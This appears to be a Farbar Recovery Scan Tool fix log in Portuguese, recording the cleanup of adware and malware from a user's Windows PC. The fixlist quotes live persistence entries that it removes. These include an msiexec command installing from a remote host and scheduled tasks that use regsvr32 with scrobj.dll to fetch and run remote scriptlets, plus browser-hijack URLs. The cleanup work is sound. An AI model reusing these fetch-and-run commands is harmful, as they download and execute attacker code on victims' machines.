Resultado da Correção pela Farbar Recovery Scan Tool (x64) Versão: 03-05-2017 01 Executado por Sil C San (03-05-2017 18:06:05) Run:2 Executando a partir de C:\Users\Sil C San\Desktop Perfis Carregados: Sil C San (Perfis Disponíveis: Sil C San & Bel) Modo da Inicialização: Normal ============================================== fixlist Conteúdo: ***************** start CloseProcesses: HKU\S-1-5-21-4089044868-1957115196-969965961-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QRTY5RYM3NUNSMURQNkU4NkIdRjF8NWM2M8MyNWU4NF== /q HKU\S-1-5-21-4089044868-1957115196-969965961-1000\...\MountPoints2: {7ec9f21f-7755-11e6-8282-bc5ff44714c2} - I:\O16Setup.EXE HKU\S-1-5-18\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.) IFEO\taskmgr.exe: [Debugger] ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo BootExecute: autocheck autochk * sdnclean64.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://br.yahoo.com/?fr=hp-avast&type=avastbcl HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms} HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://br.yahoo.com/?fr=hp-avast&type=avastbcl HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pt-br/?ocid=iehp HKU\S-1-5-21-4089044868-1957115196-969965961-1000\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATEN��O SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms} SearchScopes: HKLM-x32 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms} SearchScopes: HKU\S-1-5-21-4089044868-1957115196-969965961-1000 -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms} SearchScopes: HKU\S-1-5-21-4089044868-1957115196-969965961-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms} SearchScopes: HKU\S-1-5-21-4089044868-1957115196-969965961-1000 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms} StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A" StartMenuInternet: (HKLM) OperaStable - C:\Program Files (x86)\Opera\Launcher.exe hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-27] () <==== ATEN��O R2 Kitty; C:\Users\Sil C San\AppData\Local\Kitty\Kitty.dll [553472 2017-04-25] (kitty) [Arquivo n�o assinado] <==== ATEN��O R2 WinSAPSvc; C:\Users\Sil C San\AppData\Roaming\WinSAPSvc\WinSAP.dll [513536 2017-05-02] (win) [Arquivo n�o assinado] <==== ATEN��O R1 legendasdrv; C:\Windows\System32\drivers\legendasdrv.sys [57584 2015-12-04] (GT) S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ATEN��O S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] 2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\Users\Todos os Usu�rios\Spybot - Search & Destroy 2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy 2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2 2017-04-26 08:53 - 2017-04-26 08:53 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking 2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\Users\Todos os Usu�rios\Spybot - Search & Destroy 2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy 2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2 2017-04-26 08:53 - 2017-04-26 08:53 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking 2017-04-17 13:10 - 2017-04-17 13:10 - 00000000 ____D C:\Users\Bel\AppData\Roaming\Elex-tech 2017-04-17 11:05 - 2017-04-25 19:58 - 00000000 ____D C:\Windows\system32\log 2017-04-17 11:05 - 2016-05-22 23:41 - 00055056 _____ (Elex do Brasil Participa��es Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys 2017-04-17 11:05 - 2016-05-19 03:42 - 00052392 _____ (Elex do Brasil Participa��es Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys Task: {9487D528-8C9A-4171-ACA3-FDF7F8CC3A08} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated) Task: {C6802DAA-72EA-4B92-A407-FC62C947F18C} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATEN��O Task: {DDDCD278-6B8F-4C22-984E-34087ADEBE09} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1QRTY5RYM3NUNSMURQNkU4NkIdRjF8NWM2M8MyNWU4NF== scrobj.dll Task: {FD4D8B39-5C13-4BA2-AD17-49BAD88CD798} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1QRTY5RYM3NUNSMURQNkU4NkIdRjF8NWM2M8MyNWU4NF== scrobj.dll ShortcutWithArgument: C:\Users\Sil C San\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A ShortcutWithArgument: C:\Users\Sil C San\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A ShortcutWithArgument: C:\Users\Sil C San\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10] AlternateDataStreams: C:\Program Files (x86)\GbPlugin:u6eBQrM0Z2K3FKLVBMG8dY3IkKT2rqFO+Sf68h8fDg== [32] AlternateDataStreams: C:\Windows\System32:7B753593_Uni.gbp [2] AlternateDataStreams: C:\Windows\system32\Drivers\gbpddfac64.sys:X5ZN8aGvT4 [1270] AlternateDataStreams: C:\Windows\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [1198] AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0] AlternateDataStreams: C:\Users\Todos os Usu�rios\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0] CreateRestorePoint: RemoveProxy: EmptyTemp: Hosts: Reboot: end ***************** Processos fechados com sucesso. HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valor removido (a) com sucesso. HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{7ec9f21f-7755-11e6-8282-bc5ff44714c2} => chave removido (a) com sucesso. HKCR\CLSID\{7ec9f21f-7755-11e6-8282-bc5ff44714c2} => chave não encontrado (a). HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\SpybotPostWindows10UpgradeReInstall => valor removido (a) com sucesso. HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => chave removido (a) com sucesso. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => chave removido (a) com sucesso. HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => chave não encontrado (a). HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => chave removido (a) com sucesso. HKCR\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} => chave não encontrado (a). HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => chave removido (a) com sucesso. HKCR\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} => chave não encontrado (a). HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => chave removido (a) com sucesso. HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => chave não encontrado (a). HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => chave removido (a) com sucesso. HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => chave não encontrado (a). HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => chave removido (a) com sucesso. HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => chave não encontrado (a). HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => chave removido (a) com sucesso. HKCR\Wow6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} => chave não encontrado (a). HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => chave removido (a) com sucesso. HKCR\Wow6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} => chave não encontrado (a). HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => chave removido (a) com sucesso. HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => chave não encontrado (a). HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => chave removido (a) com sucesso. HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => chave não encontrado (a). HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => valor restaurado com sucesso HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => valor restaurado com sucesso HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => valor restaurado com sucesso HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => valor restaurado com sucesso HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => valor restaurado com sucesso HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => valor restaurado com sucesso HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => valor restaurado com sucesso HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => valor restaurado com sucesso HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache => valor removido (a) com sucesso. HKU\S-1-5-21-4089044868-1957115196-969965961-1000_Classes\ChromeHTML => chave não encontrado (a). HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor restaurado com sucesso HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a). HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a). HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor restaurado com sucesso HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a). HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a). HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => chave não encontrado (a). HKCR\Wow6432Node\CLSID\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => chave não encontrado (a). HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor removido (a) com sucesso. HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a). HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a). HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => chave não encontrado (a). HKCR\CLSID\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => chave não encontrado (a). HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => valor restaurado com sucesso Chrome HomePage => não encontrado (a). Chrome StartupUrls => não encontrado (a). HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\shell\open\command\\Default => valor restaurado com sucesso FirefoxU => serviço não encontrado (a). Kitty => serviço não encontrado (a). WinSAPSvc => serviço não encontrado (a). legendasdrv => Serviço finalizado com sucesso. HKLM\System\CurrentControlSet\Services\legendasdrv => chave removido (a) com sucesso. legendasdrv => serviço removido (a) com sucesso. iSafeKrnlMon => serviço não encontrado (a). HKLM\System\CurrentControlSet\Services\Synth3dVsc => chave removido (a) com sucesso. Synth3dVsc => serviço removido (a) com sucesso. HKLM\System\CurrentControlSet\Services\tsusbhub => chave removido (a) com sucesso. tsusbhub => serviço removido (a) com sucesso. HKLM\System\CurrentControlSet\Services\VGPU => chave removido (a) com sucesso. VGPU => serviço removido (a) com sucesso. "C:\Users\Todos os Usu�rios\Spybot - Search & Destroy" => não encontrado (a). C:\ProgramData\Spybot - Search & Destroy => movido com sucesso C:\Program Files (x86)\Spybot - Search & Destroy 2 => movido com sucesso C:\Windows\System32\Tasks\Safer-Networking => movido com sucesso "C:\Users\Todos os Usu�rios\Spybot - Search & Destroy" => não encontrado (a). "C:\ProgramData\Spybot - Search & Destroy" => não encontrado (a). "C:\Program Files (x86)\Spybot - Search & Destroy 2" => não encontrado (a). "C:\Windows\System32\Tasks\Safer-Networking" => não encontrado (a). "C:\Users\Bel\AppData\Roaming\Elex-tech" => não encontrado (a). C:\Windows\system32\log => movido com sucesso "C:\Windows\system32\Drivers\iSafeKrnlBoot.sys" => não encontrado (a). "C:\Windows\system32\Drivers\iSafeNetFilter.sys" => não encontrado (a). HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{9487D528-8C9A-4171-ACA3-FDF7F8CC3A08} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9487D528-8C9A-4171-ACA3-FDF7F8CC3A08} => chave removido (a) com sucesso. C:\Windows\System32\Tasks\Adobe Acrobat Update Task => movido com sucesso HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Acrobat Update Task => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6802DAA-72EA-4B92-A407-FC62C947F18C} => chave não encontrado (a). C:\Windows\System32\Tasks\Milimili => não encontrado (a). HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => chave não encontrado (a). HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DDDCD278-6B8F-4C22-984E-34087ADEBE09} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DDDCD278-6B8F-4C22-984E-34087ADEBE09} => chave removido (a) com sucesso. C:\Windows\System32\Tasks\PowerWord-SCT-JT => movido com sucesso HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FD4D8B39-5C13-4BA2-AD17-49BAD88CD798} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FD4D8B39-5C13-4BA2-AD17-49BAD88CD798} => chave removido (a) com sucesso. C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe => movido com sucesso HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => chave removido (a) com sucesso. C:\Users\Sil C San\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk => Atalho argumento removido (a) com sucesso.. C:\Users\Sil C San\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk => Atalho argumento removido (a) com sucesso.. C:\Users\Sil C San\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Atalho argumento removido (a) com sucesso.. C:\Program Files (x86)\GbPlugin => ":IncompleteStartProcessProtection.cnt" ADS removido (a) com sucesso.. C:\Program Files (x86)\GbPlugin => ":u6eBQrM0Z2K3FKLVBMG8dY3IkKT2rqFO+Sf68h8fDg==" ADS removido (a) com sucesso.. C:\Windows\System32 => ":7B753593_Uni.gbp" ADS removido (a) com sucesso.. C:\Windows\system32\Drivers\gbpddfac64.sys => ":X5ZN8aGvT4" ADS removido (a) com sucesso.. C:\Windows\system32\Drivers\wsddfac.sys => ":X5ZN8aGXs4" ADS removido (a) com sucesso.. C:\ProgramData\Reprise => ":wupeogjxlctlfudivq`qsp`28hfm" ADS removido (a) com sucesso.. "C:\Users\Todos os Usu�rios\Reprise" => ":wupeogjxlctlfudivq`qsp`28hfm" ADS não encontrado (a). Ponto de Restauração criado com sucesso. ========= RemoveProxy: ========= HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso. HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso. HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso. HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso. ========= Fim de RemoveProxy: ========= C:\Windows\System32\Drivers\etc\hosts => movido com sucesso Hosts restaurado com sucesso. =========== EmptyTemp: ========== BITS transfer queue => 12582912 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 21460453 B Java, Flash, Steam htmlcache => 7461778 B Windows/system/drivers => 2571811 B Edge => 0 B Chrome => 73808952 B Firefox => 0 B Opera => 1611488 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 219196 B systemprofile32 => 3754762 B LocalService => 66228 B NetworkService => 66228 B Sil C San => 18752276 B Bel => 20334892 B RecycleBin => 4858432 B EmptyTemp: => 159.8 MB de dados temporários Removidos. ================================ O sistema precisou ser reiniciado. ==== Fim de Fixlog 18:07:01 ====